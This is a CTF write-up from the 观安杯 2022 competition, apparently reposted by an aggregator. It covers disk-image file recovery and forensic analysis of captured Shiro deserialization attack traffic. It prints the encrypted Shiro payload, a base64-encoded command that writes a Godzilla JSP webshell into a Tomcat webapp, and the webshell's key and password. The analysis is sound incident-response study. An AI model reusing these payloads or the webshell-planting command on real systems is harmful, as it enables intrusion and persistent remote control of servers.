观安杯 2022 Writeup
source link: https://5ime.cn/isg-2022.html
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
观安杯 2022 Writeup
开学事比较多,并且观安和网鼎时间完美重合,简单划划水。
黑客李明在自己的磁盘上编辑完一份重要文件后立马删除了,我们拿到了他的磁盘镜像文件,你能帮我们找出来他所编辑过的机密文件吗?
使用 DiskGenius
打开 img
文件,\$RECYCLE.BIN\S-1-5-21-87142730-3356978945-767715265-500
发现word文档,右击提取到桌面
delete
删掉猫图,发现 flag
castle
某公司的网站遭到了黑客入侵,应急响应小组已经从防护设备中提取了入侵流量,请你一起分析黑客的攻击手法,并找出被黑客窃取的秘密
一顿分析下来发现是 shiro反序列化
的流量包
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
发现通过 echo
执行了一段 base64
,解码一下发现向 logout.jsp
写入了内容
ZWNobyBINHNJQUZ2Zi9XSUMvN1ZXYTIvYk5oVDlLNXlBQUNRbUVFbmFCR3RWcllpVERDaTJyQzNjWWdHR2ZhQ29hMXVkWGlPcFJLN2cvOTdMaHh3N3NkTzFSVDRrb3Noekw4ODlQT0wxcTRPZnlOU29vcDZUWHFiUk0za0toOWt2NG9VOE9qaytmaTZpWkZ4dGhkWnBaUC9melZYNVNZcC8xTTcrM0V1V0VGbmlrRndUNkEzVXVTYm45djJQUnVTZ2hyYkx5a0tTYTdveFNUNnpRWGN0S1BxWkphdUFjT3ZrUGMyV0J2NytoOGlNRFFwTXAycmlvRHlIV1ZHRFExR1p4ZVF3Umd3dm9aNmJCV1loWTU0UTM0K0pkSncxVFFtaUpoVWJpRkhMNFpPNEVUMlhhdG1haHA4WDdRSVp5WFRITEorRGVWTnJJMm9KTkRxN25FWXNrYnlvQzBPcjEwY3ZqK01hYnNsV25HNUI4aWxJWlA0N0xLZjRSbnRwMDB5UWpLWXM5bGxZRWtxVFBHOStLMnBSVW8wNnJxUXdja0hvWlMraE5VVlRFMWlMVUhkbGlZZ1ZDV1VpSzRPUHV6T2hZYWdaR2NJUVEwbnFJN0Z1NGdybkdtU25DclBrVjZDMW1NTkZNUWR0U0pWVWlIMEVzUzNHMWNVSmlsSHhyczJGQWFvM2E3UkhvOFBKVUYrcnBSRzA0cFV3Q3o0cDVtOXFBM1Awd0ZGTUtwNjdQUkROVGVQWjA2TlQrL0t4eGNNL0Z4cW9QZVFkQXBGaEZTVENCeXEwVzZBTU01dyt2NnhsazhQb2pBeWxNZ3ZWM0dweWwzRHdQdlQ0SkVUZmlMS0RMU245ZXVyQWZOYW9QMFdGcXJqNk9sT1VmT0xXVWFLMzJTZVFodmlkRmVid2tWYXZLekNMSnFjUkRzTnlGTHN0R0hyc3B2a1hpVHBzbUV4R0Z1R2tXUWl5cWZ4bndUYXpnbHY5RU5TMG1mRUFIQTVMSDhKbnd2Mm51MXJ2R0hKNnRPZnU0UmEwN3dDY0ltUzNKTHFyZVZWb3lTZG4wOHZ4QkJRS1EvWXBnenV2Zllhdzc2bjY2YW85dG40YkRlZW9QYlRjYUM5WHpnVTR5NDAyL0xybFF2U1BXeTZIUnkzbmlmMWZ5M2xXTE9UY0k3NWZmU0Mrci8yQitDSFhrMWx0TFBET2FnOFUyV2UxYjZoMjBzMW1Yc1ducVhtbjRRNStmWFZnTzFud0NsN0JJdDJ5bTRML3VuQm52eE1LMVRGNDBkcUdqZGV4US9mVVBtSXlFNlVHbGhRelFqWGU5cmlsalRrelNEL3I4R0xIM3I4c3NXbEhMRTJkSllZUnBuZkNYRXU4cG1aUjZIdXliZlIvZTgyL2R3U1F6Z3FRd1RBU3ZwODFjTmRSN09DSnMzdlJjTnRyenBRU3k3ZWRhVHVEY29Pb2lGQUszOU4xcTlrSHBPdVBaSlpTLzh1RWZhVjhkczhzTTQ2TVVUenE5OXlZYUxGbG5qZlkzSHBqZTU5dW0xcURUZnNYTmxWYlBMKzFBNG85bStzdTA3N2JIY2JZNzJ5V2RmOTdOSGlybi9XQkJNYXV5N1Y5MktnT0dQc0dFbzdDYXZmdkVEVGRGM0J4WlFJM0NnQUEgfGJhc2U2NCAtZHxnemlwIC1kID4gL3Vzci9sb2NhbC90b21jYXQvd2ViYXBwcy9ST09UL2xvZ291dC5qc3A=
再次解密发现就是最常见的哥斯拉 jsp马
在最后一个流里发现pass变成了supersuperpassword
解密一下发现新写入路径 index.html 和 新密钥
path=/index.html
secretKey=57e7bebdf2501f02
evalClassName=org.apache.coyote.ser.std.SerializableSerializer
methodName=run
pwd=supersuperpassword
我们直接更换密钥再次解密,解密最后的响应包得到flag
4611012B612C3BAEPHCNu5r7f03UZyZQ5gQIbjDUiDIV3stT2ZcFdJ93TLGhwtWGNkxIaVxiqBTwpqYoGA6ZJz8w/UD9h2A0vwpkyA==C9331C0E8C9FA966
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK